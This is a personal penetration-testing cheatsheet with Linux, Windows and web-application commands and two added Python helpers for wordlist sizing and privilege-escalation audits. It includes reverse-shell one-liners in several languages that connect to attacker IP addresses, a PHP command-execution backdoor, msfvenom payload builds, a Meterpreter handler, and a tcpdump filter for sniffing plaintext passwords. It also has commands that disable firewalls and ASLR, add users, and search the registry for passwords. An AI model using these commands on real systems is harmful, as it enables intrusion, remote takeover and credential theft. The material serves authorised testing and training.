Intro

Pentesting Cheatsheet

An unstructured list of bolts & clamps I have collected over time.

Linux

Privileges

find all setuid or setgid programs (-perm /6000 matches either bit; -perm -6000 would only match files that have both)

find / -perm /6000 -print

set file immutable (even root cannot delete it)

chattr +i test.txt

set file append only. Can only add new content, not remove old

chattr +a test.txt

verify immutable flag (plus other flags)

lsattr

revoke read+write+execute from group and others, recursively (as written this hits the whole filesystem; use . for the current directory tree)

chmod -R go-rwx /*

grant read+execute to all users, recursively (a+rx does not add the write bit)

chmod -R a+rx /*

set the umask so new files get every permission bit (0666 files, 0777 directories); to let only a file's owner delete it, set the sticky bit on the directory instead

cat, grep & misc commands

cat all .txt files recursively; list every file and grep the listing for passwd; grep files named foo for a string

find . -name '*.txt' -exec cat {} \;
find . -name '*' -exec ls -asl {} \; 2>/dev/null | grep passwd
find . -name foo -type f -print0 | xargs -0 grep "password"

find a pattern in a file and suppress stderr

grep 'pattern' file 2>/dev/null
grep -s 'pattern' file

Network Scanning

Unicornscan UDP scan over a tunnel interface (often faster than nmap for UDP)

unicornscan -mU -p 161 10.11.1.0/24 -i tap0

Masscan over tunnel

masscan -p1-65500 10.11.1.219 --interface tap0 --router-mac 00-50-56-89-35-90

nmap: run every script in the vuln category against a host

nmap --script vuln [host]

Traffic Dump

Grab everything between two keywords

tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p'

Grab usernames and passwords sent over plain HTTP

tcpdump -i eth0  port http -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20

SSH Port Forwarding

SSH local port forwarding
Make services on the remote network accessible to your host via a local listener. The service running on the remote host on TCP port 8834 is accessible by connecting to 8834 on the SSH client system.

ssh -L 8834:localhost:8834 user@target_ip

SSH remote port forwarding
Make services on your local system / local network accessible to the remote host via a remote listener. The SSH server will be able to access TCP port 80 on 172.16.0.99 (a host accessible from the SSH client) by connecting to 127.0.0.1:8000 on the SSH server.

ssh -R 127.0.0.1:8000:172.16.0.99:80 10.0.0.1

Password cracking and wordlists

Crunch Wordlist Generator

Placeholders for the -t pattern option:
    @ - Lower case alpha characters
    , - Upper case alpha characters
    % - Numeric characters
    ^ - Special characters including space

    example (8-character words: one upper, two lower, two special, three digits):
    crunch 8 8 -t ,@@^^%%%
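Added example, not part of the original cheatsheet: the placeholder table above as a small Python model that expands a -t pattern into its candidates and sizes its keyspace, which is the number to hold against a password policy when judging how long a mask attack needs. The special-character set is an assumption (crunch's built-in list may differ) and can be overridden via `classes`.

```python
from itertools import product
import string

# Character classes behind crunch's -t placeholders. The special-character set is an
# assumption (crunch's built-in list may differ); override it via `classes` if needed.
CRUNCH_CLASSES = {
    "@": string.ascii_lowercase,                     # 26
    ",": string.ascii_uppercase,                     # 26
    "%": string.digits,                              # 10
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ ",      # 33, including space
}

def pattern_charsets(pattern, classes=CRUNCH_CLASSES):
    """Characters crunch would try at each position; non-placeholder chars stay literal."""
    return [classes.get(ch, ch) for ch in pattern]

def keyspace(pattern, classes=CRUNCH_CLASSES):
    """Number of candidates `crunch N N -t pattern` emits (N = len(pattern))."""
    n = 1
    for charset in pattern_charsets(pattern, classes):
        n *= len(charset)
    return n

def candidates(pattern, classes=CRUNCH_CLASSES):
    """Lazily yield every candidate; the rightmost position varies fastest."""
    for combo in product(*pattern_charsets(pattern, classes)):
        yield "".join(combo)

def hours_to_exhaust(pattern, guesses_per_second, classes=CRUNCH_CLASSES):
    """Wall-clock hours a cracker needs at the given guess rate to try the whole pattern,
    i.e. the figure to compare against a policy's composition rules and rotation period."""
    return keyspace(pattern, classes) / guesses_per_second / 3600

if __name__ == "__main__":
    for pat in (",@@^^%%%", "%%%%%%%%", "Admin%%%"):
        print(f"{pat:10s} keyspace={keyspace(pat):>15,}  hours at 1e9/s={hours_to_exhaust(pat, 1e9):.3f}")
```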

Custom dictionary from website

cewl -d 2 -m 5 -w docswords.txt http://docs.kali.org

Create a Norwegian wordlist from Wikipedia article text (the stage that deleted every non-ASCII byte is left out, otherwise æøå never reach the final filter)

wget http://download.wikimedia.org/nowiki/latest/nowiki-latest-pages-articles.xml.bz2

bzcat nowiki-latest-pages-articles.xml.bz2 \
  | grep '^[a-zA-Z]' \
  | sed 's/[-_:.,;#@+?{}()&|§!¤%`<>="\/]/\ /g' \
  | tr ' ' '\n' \
  | sed -e 's/./\L\0/g' \
  | sed 's/[^abcdefghijklmnopqrstuvwxyzæøå]//g' \
  | sort -u \
  | pw-inspector -m1 -M20 > nowiki.lst

Reverse-shell oneliners

bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

perl

perl -e 'use Socket;$i="192.168.26.31";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.26.31",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

Reverse Shell

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Command backdoor

<?php echo shell_exec($_GET['cmd']);?>

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 10.0.0.1 1234

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Xterm

xterm -display 10.0.0.1:1

SMB

List shares

smbclient -L 1.2.3.4

Connect to share

smbclient \\\\1.2.3.4\\SHARE

Nmap SMB scripts:

nmap -v -p 139,445 [IP] --script=smb-vuln-conficker.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-cve2009-3103.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms06-025.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms07-029.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms08-067.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms10-054.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms10-061.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms17-010.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-regsvc-dos.nse

SNMP

onesixtyone -c <community list file> <ip-address>
snmpwalk -c <community string> -v <version> <ip address>

MSFVenom

Windows

Staged reverse TCP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

Stageless (single) reverse TCP

msfvenom -p windows/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

Linux

Staged reverse TCP

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >reverse.elf

Stageless (single) reverse TCP

msfvenom -p linux/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >reverse.elf

VBA/VBS payload

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

Meterpreter

Meterpreter handler template

use exploit/multi/handler
set PAYLOAD osx/x64/meterpreter/reverse_tcp
set LHOST 10.10.1.12
set LPORT 4444
set ExitOnSession false
exploit -j -z

Compiling

create object file, and link it

nasm -f elf -o shellcode.o shellcode.nasm
ld -melf_i386 -z execstack -o shellcode shellcode.o

compile in one go

gcc -z execstack -o shellcode shellcode.c

compile a 64-bit Windows PE on Kali

x86_64-w64-mingw32-gcc shell.c -o shell.exe

compile a 32-bit Windows PE on Kali

i686-w64-mingw32-gcc shell.c -o shell.exe

generate Intel-syntax assembly from C without assembling or linking

gcc -S -fno-asynchronous-unwind-tables -masm=intel *.c

Binary Exploitation and Reversing

ASLR

disable ASLR system-wide (randomize_va_space: 0 = off, 1 = conservative, 2 = full randomization)

echo 0 > /proc/sys/kernel/randomize_va_space

disable ASLR on a single bash session, instead of the whole OS

setarch $(uname --machine) --addr-no-randomize bash

PWN TOOLS

assemble the shellcraft sh() template into machine code bytes (pwntools)

from pwn import *
print(repr(asm(shellcraft.sh())))

Ret2LibC

find the address of the "/bin/sh" string inside libc (search range is libc's mapping, taken from info proc mappings)

(gdb) break main
Breakpoint 1 at 0x8048570
(gdb) run
Starting program: /root/Desktop/RE/intro_rev_binary_expl/exploitation/examples/hello

Breakpoint 1, 0x08048570 in main ()
(gdb) find 0xf7dba000,0xf7f8c000,"/bin/sh"
0xf7f35988
1 pattern found.

RADARE2

Cheat sheet
https://github.com/zxgio/r2-cheatsheet/blob/master/r2-cheatsheet.pdf

Windows

Version information

WINDOWS NT
5.0   2000
5.1   XP/legacy
5.2   XP64/Server 2003 (R2)
6.0   Vista/Server 2008
6.1   7/Server 2008R2/Home Server 2011
6.2   8/Server 2012
6.3   8.1/Server 2012R2
10.0  10/Server 2016

Basic enumeration

General system info

systeminfo

Get hostname

hostname

Current user

whoami

Current user, group and permissions

whoami /all

IP and Networking

ipconfig /all
route print
netstat -bano
netstat -r

wingrep

command | findstr /C:"str"

show the PATH environment variable

path

run an executable as another user, loading that user's profile (/user:)

runas /profile /user:administrator "C:\absolute\path\pcoff.exe"

run a process in the background

START /B process.exe

execute all files in a directory

for %%i in (C:\abs\path\*) do %%i
for /F "usebackq" %i in (`dir /b C:\macros\Day\`) DO %i

User

whoami
net users

list users in current domain

net user /domain

list user info

net user username

add local system user

net user name pass /add

check user’s network group membership

net user name setpword
net user /DOMAIN %USERNAME%

check another user’s information

net user /domain user

list users in AD group

net group "Domain Users" /domain

list members of domain groups (the last line adds a user to the local Remote Desktop Users group)

net localgroup "administrators" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Controllers" /domain
NET LOCALGROUP "Remote Desktop Users" trinity /ADD

List password policy for localhost / the domain

net accounts
net accounts /domain

Networking

view full ARP table

arp -a

view available network share hosts

net view

view available shares on host

net view \\HOST

Queries NBNS/SMB (SAMBA) and tries to find all hosts in ‘otherdomain’

net view /domain:otherdomain

Lists tasks w/users running those tasks on a remote system

tasklist /V /S computername

Firewall

netsh firewall show state
netsh firewall show config
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

Configure NIC to use DHCP

netsh interface ip set address local dhcp

open port (for rdesktop)

netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

block inbound connections to a port from a given remote IP (example rule for MSSQL 1433)

netsh advfirewall firewall add rule name="Block mssql attack ips" dir=in action=block protocol=TCP localport=1433 remoteip=22.75.175.213

Auto-Start Directories

Windows NT 6.1, 6.0
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
Windows NT 5.2, 5.1, 5.0
%SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\
Windows 9x
%SystemDrive%\WINDOWS\Start Menu\Programs\StartUp\
Windows NT 4.0, 3.51, 3.50
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\

SMB

map remote hard drive to local path

net use * \\remote_ip\c$ password /u:remote_ip\username

verify shares

net use [sharename]

Powershell

locally use PS to execute command as admin, given admin password

$user = "PC\Administrator";
$password = "test1234";
$pass_string = convertTo-SecureString -AsPlaintext -Force $password;
$cred = new-object system.management.automation.pscredential($user, $pass_string);
Invoke-Command -ComputerName 127.0.0.1 -Credential $cred -ScriptBlock { type C:/Users/Administrator/Desktop/root.txt ; type C:/Users/h.potter/user.txt }

Privilege Escalation

Full control (F) for Everyone or Users under Program Files? Replace (F) with (M) to check for modify rights

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

Unquoted service paths?

wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
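Added example, not from the cheatsheet: the two audits above (weak ACLs under Program Files and unquoted auto-start service paths) as Python over icacls and wmic output, so they can run offline against output saved from many hosts. The sample lines are constructed, and principal parsing assumes Everyone, CREATOR OWNER, BUILTIN\... and NT AUTHORITY\... style names.

```python
import re

# Constructed sample in the layout icacls prints: the first ACE follows the path on the
# same line, further ACEs for that path are indented on their own lines.
ICACLS_SAMPLE = r"""
C:\Program Files\My App BUILTIN\Users:(OI)(CI)(F)
                        NT AUTHORITY\SYSTEM:(OI)(CI)(F)
C:\Program Files\Other App Everyone:(OI)(CI)(M)
                           BUILTIN\Users:(OI)(CI)(RX)
C:\Program Files\Good App NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                          BUILTIN\Administrators:(OI)(CI)(F)
"""
# Constructed sample in the layout of "wmic service get name,displayname,pathname,startmode".
WMIC_SAMPLE = r"""
Name     DisplayName     PathName                                     StartMode
Spooler  Print Spooler   C:\Windows\System32\spoolsv.exe              Auto
VulnSvc  Vulnerable Svc  C:\Program Files\My App\bin\service.exe      Auto
SafeSvc  Safe Svc        "C:\Program Files\Other App\svc.exe" -k net  Auto
ManSvc   Manual Svc      C:\Tools\some tool\tool.exe                  Manual
"""
# Non-greedy path, then principal, then ACE flags. Multi-word principals are listed
# explicitly (assumed name families) because paths contain spaces too.
ACE_RE = re.compile(r"^(?P<path>.*?)\s*(?P<who>Everyone|CREATOR OWNER|NT AUTHORITY\\[^\s:]+"
                    r"|BUILTIN\\[^\s:]+|[^\s:]+):(?P<aces>(?:\([A-Z,]*\))+)\s*$")
WEAK_PRINCIPALS = ("Everyone", r"BUILTIN\Users")

def weak_acls(icacls_output, rights=("(F)", "(M)")):
    """(path, principal, aces) for each ACE giving Everyone or BUILTIN\\Users one of `rights`;
    indented continuation lines inherit the path of the entry above them."""
    hits, path = [], None
    for line in icacls_output.splitlines():
        m = ACE_RE.match(line)
        if not m:
            continue
        if not line[:1].isspace():            # unindented line: starts a new path entry
            path = m.group("path")
        if m.group("who") in WEAK_PRINCIPALS and any(r in m.group("aces") for r in rights):
            hits.append((path, m.group("who"), m.group("aces")))
    return hits

def unquoted_service_paths(wmic_output):
    """(name, path) for Auto-start services whose binary path is unquoted, contains a space
    and lies outside C:\\Windows, i.e. the same filter as the wmic | findstr chain."""
    rows = [re.split(r"\s{2,}", l.strip()) for l in wmic_output.splitlines() if l.strip()]
    hits = []
    for name, _display, path, mode in rows[1:]:   # rows[0] is the column header
        exe = path.lower().split(".exe")[0]       # only the executable part, not its arguments
        if (mode.lower() == "auto" and not path.startswith('"')
                and " " in exe and not exe.startswith("c:\\windows\\")):
            hits.append((name, path))
    return hits
```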

Passwords in registry?

reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s


Web Applications

Parsing

curl [IP] -s -L | html2text -width '99' | uniq

Injections

SQLi

SQLmap example

sqlmap -m [external url list] --crawl=6 --threads=10 --random-agent --dbms=mysql|mssql|postgresql|oracle --level=5 --risk=3